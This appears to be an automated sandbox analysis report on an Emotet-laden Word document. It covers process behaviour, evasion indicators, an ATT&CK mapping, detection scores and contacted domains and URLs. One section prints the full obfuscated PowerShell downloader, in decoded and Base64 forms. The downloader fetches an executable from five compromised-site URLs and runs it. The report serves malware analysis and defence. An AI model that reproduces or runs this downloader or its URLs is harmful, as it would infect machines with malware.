Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 1066Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3491Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5251Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4120Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: powershell.exe, 00000002.00000002.248847814.000001C9B3A20000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000002.00000002.248847814.000001C9B3A20000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000002.00000002.248847814.000001C9B3A20000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 00000002.00000002.247687763.000001C9B3660000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000002.00000002.248847814.000001C9B3A20000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Document contains VBA stomped code (only p-code) potentially bypassing AV detectionShow sources
Source: emotet.docOLE indicator, VBA stomping: true
Source: emotet.docOLE indicator, VBA stomping: true
Source: emotet.docOLE indicator, VBA stomping: true
Source: emotet.docOLE indicator, VBA stomping: true
Source: emotet.docOLE indicator, VBA stomping: true
Source: emotet.docOLE indicator, VBA stomping: true
Source: emotet.docOLE indicator, VBA stomping: true
Source: emotet.docOLE indicator, VBA stomping: true
Source: emotet.docOLE indicator, VBA stomping: true
Source: emotet.docOLE indicator, VBA stomping: true
Source: emotet.docOLE indicator, VBA stomping: true
Source: emotet.docOLE indicator, VBA stomping: true
Source: emotet.docOLE indicator, VBA stomping: true
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $jrFhA0='Wf1rHz';$uUMMLI = '284';$iBtj49N='ThMqW8s0';$FwcAJs6=$env:userprofile+'\'+$uUMMLI+'.exe';$S9GzRstM='EFCwnlGz';$u8UAr3=&('n'+'ew'+'-object') NeT.wEBClIEnt;$pLjBqINE='http://blockchainjoblist.com/wp-admin/014080/@https://womenempowermentpakistan.com/wp-admin/paba5q52/@https://atnimanvilla.com/wp-content/073735/@https://yeuquynhnhai.com/upload/41830/@https://deepikarai.com/js/4bzs6/'."sPL`iT"('@');$l4sJloGw='zISjEmiP';foreach($V3hEPMMZ in $pLjBqINE){try{$u8UAr3."DOw`N`lOaDfi`Le"($V3hEPMMZ, $FwcAJs6);$IvHHwRib='s5Ts_iP8';If ((&('G'+'e'+'t-Item') $FwcAJs6)."LeN`gTh" -ge 23931) {[Diagnostics.Process]::"ST`ArT"($FwcAJs6);$zDNs8wi='F3Wwo0';break;$TTJptXB='ijlWhCzP'}}catch{}}$vZzi_uAp='aEBtpj4'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsCommand and Scripting Interpreter1Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsScripting2Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
Cloud AccountsPowerShell2Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting2Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
emotet.doc74%VirustotalBrowse
emotet.doc38%MetadefenderBrowse
emotet.doc73%ReversingLabsDocument-Word.Trojan.Powload
emotet.doc100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
atnimanvilla.com6%VirustotalBrowse
yeuquynhnhai.com2%VirustotalBrowse
deepikarai.com5%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://blockchainjoblist.com/px.js?ch=10%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/pics/12471/logo.png)0%Avira URL Cloudsafe
http://blockchainjoblist.com/px.js?ch=20%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)0%Avira URL Cloudsafe
https://www.deepikarai.comx0%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff20%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff20%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot0%Avira URL Cloudsafe
http://blockchainjoblist.com/Health_Insurance.cfm?fp=UNp9KuFPAcCTenEa6itRJa913cc60MeA8201KF8DJgPKzvT0%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/pics/12471/libg.png)0%Avira URL Cloudsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://deepikarai.comx0%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf0%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf0%Avira URL Cloudsafe
https://womenempowermentpakistan.com0%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix0%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b0%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r0%Avira URL Cloudsafe
http://blockchainjoblist.com/High_Speed_Internet.cfm?fp=UNp9KuFPAcCTenEa6itRJa913cc60MeA8201KF8DJgPK0%Avira URL Cloudsafe
http://blockchainjoblist.com0%Avira URL Cloudsafe
http://blockchainjoblist.comx0%Avira URL Cloudsafe
https://yeuquynhnhai.com0%Avira URL Cloudsafe
https://atnimanvilla.comx0%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)0%Avira URL Cloudsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
http://ww38.yeuquynhnhai.com0%Avira URL Cloudsafe
https://deepikarai.com/js/4bzs6/(pg0%Avira URL Cloudsafe
http://blockchainjoblist.com/Migraine_Pain_Relief.cfm?fp=UNp9KuFPAcCTenEa6itRJa913cc60MeA8201KF8DJgP0%Avira URL Cloudsafe
http://deepikarai.com0%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff0%Avira URL Cloudsafe
http://blockchainjoblist.com/__media__/js/trademark.php?d=blockchainjoblist.com&type=mng0%Avira URL Cloudsafe
https://atnimanvilla.com/wp-content/073735/100%Avira URL Cloudmalware
http://blockchainjoblist.com/Best_Penny_Stocks.cfm?fp=UNp9KuFPAcCTenEa6itRJa913cc60MeA8201KF8DJgPKzv0%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff0%Avira URL Cloudsafe
https://www.deepikarai.com0%Avira URL Cloudsafe
http://ww38.yeuquynhnhai.com/upload/41830/0%Avira URL Cloudsafe
http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
https://www.deepikarai.com/js/4bzs6/0%Avira URL Cloudsafe
http://atnimanvilla.com0%Avira URL Cloudsafe
https://sectigo.com/CPS00%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot0%Avira URL Cloudsafe
http://ocsp.int-x3.letsencrypt.org0/0%URL Reputationsafe
http://ocsp.int-x3.letsencrypt.org0/0%URL Reputationsafe
http://ocsp.int-x3.letsencrypt.org0/0%URL Reputationsafe
https://deepikarai.com0%Avira URL Cloudsafe
http://ww38.yeuquynhnhai.comx0%Avira URL Cloudsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://blockchainjoblist.com/Cheap_Air_Tickets.cfm?fp=UNp9KuFPAcCTenEa6itRJa913cc60MeA8201KF8DJgPKzv0%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf0%Avira URL Cloudsafe
https://womenempowermentpakistan.comx0%Avira URL Cloudsafe
https://yeuquynhnhai.comx0%Avira URL Cloudsafe
https://deepikarai.com/js/4bzs6/0%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf0%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/pics/12471/arrow.png)0%Avira URL Cloudsafe
http://blockchainjoblist.com/sk-logabpstatus.php?a=OUYxY2s4RndLc0RVbkQxazhBbjBCNHgxeEpxWFRUTXh1V1U4S0%Avira URL Cloudsafe
http://womenempowermentpakistan.com0%Avira URL Cloudsafe
http://www.deepikarai.com0%Avira URL Cloudsafe
http://crl.microsof0%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/pics/12471/libgh.png)0%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)0%Avira URL Cloudsafe
https://deepikarai.com/js/4bzs6/an.c0%Avira URL Cloudsafe
http://blockchainjoblist.com/display.cfm0%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/js/min.js?v2.20%Avira URL Cloudsafe
http://blockchainjoblist.com/wp-admin/014080/0%Avira URL Cloudsafe
http://blockchainjoblist.com/10_Best_Mutual_Funds.cfm?fp=UNp9KuFPAcCTenEa6itRJa913cc60MeA8201KF8DJgP0%Avira URL Cloudsafe
https://yeuquynhnhai.com/upload/41830/0%Avira URL Cloudsafe
http://yeuquynhnhai.com0%Avira URL Cloudsafe
http://blockchainjoblist.com/Dental_Plans.cfm?fp=UNp9KuFPAcCTenEa6itRJa913cc60MeA8201KF8DJgPKzvTnog40%Avira URL Cloudsafe
https://atnimanvilla.com0%Avira URL Cloudsafe
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix0%Avira URL Cloudsafe
https://womenempowermentpakistan.com/wp-admin/paba5q52/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
atnimanvilla.com
172.67.180.202
truetrueunknown
yeuquynhnhai.com
103.224.212.219
truetrueunknown
701602.parkingcrew.net
13.248.148.254
truefalse
    		high
    deepikarai.com
    		173.198.248.218
    		truetrueunknown
    blockchainjoblist.com
    		204.11.56.48
    		truetrue
      		unknown
      womenempowermentpakistan.com
      		204.11.56.48
      		truetrue
        		unknown
        www.deepikarai.com
        		unknown
        		unknowntrue
          		unknown
          ww38.yeuquynhnhai.com
          		unknown
          		unknowntrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://ww38.yeuquynhnhai.com/upload/41830/false
            • Avira URL Cloud: safe
            		unknown
            http://blockchainjoblist.com/wp-admin/014080/true
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://blockchainjoblist.com/px.js?ch=1powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drfalse
            • Avira URL Cloud: safe
            		unknown
            http://i2.cdn-image.com/__media__/pics/12471/logo.png)284.exe.2.drfalse
            • Avira URL Cloud: safe
            		unknown
            http://blockchainjoblist.com/px.js?ch=2powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drfalse
            • Avira URL Cloud: safe
            		unknown
            http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)284.exe.2.drfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.deepikarai.comxpowershell.exe, 00000002.00000002.246675264.000001C99CA17000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drtrue
            • Avira URL Cloud: safe
            		unknown
            http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drtrue
            • Avira URL Cloud: safe
            		unknown
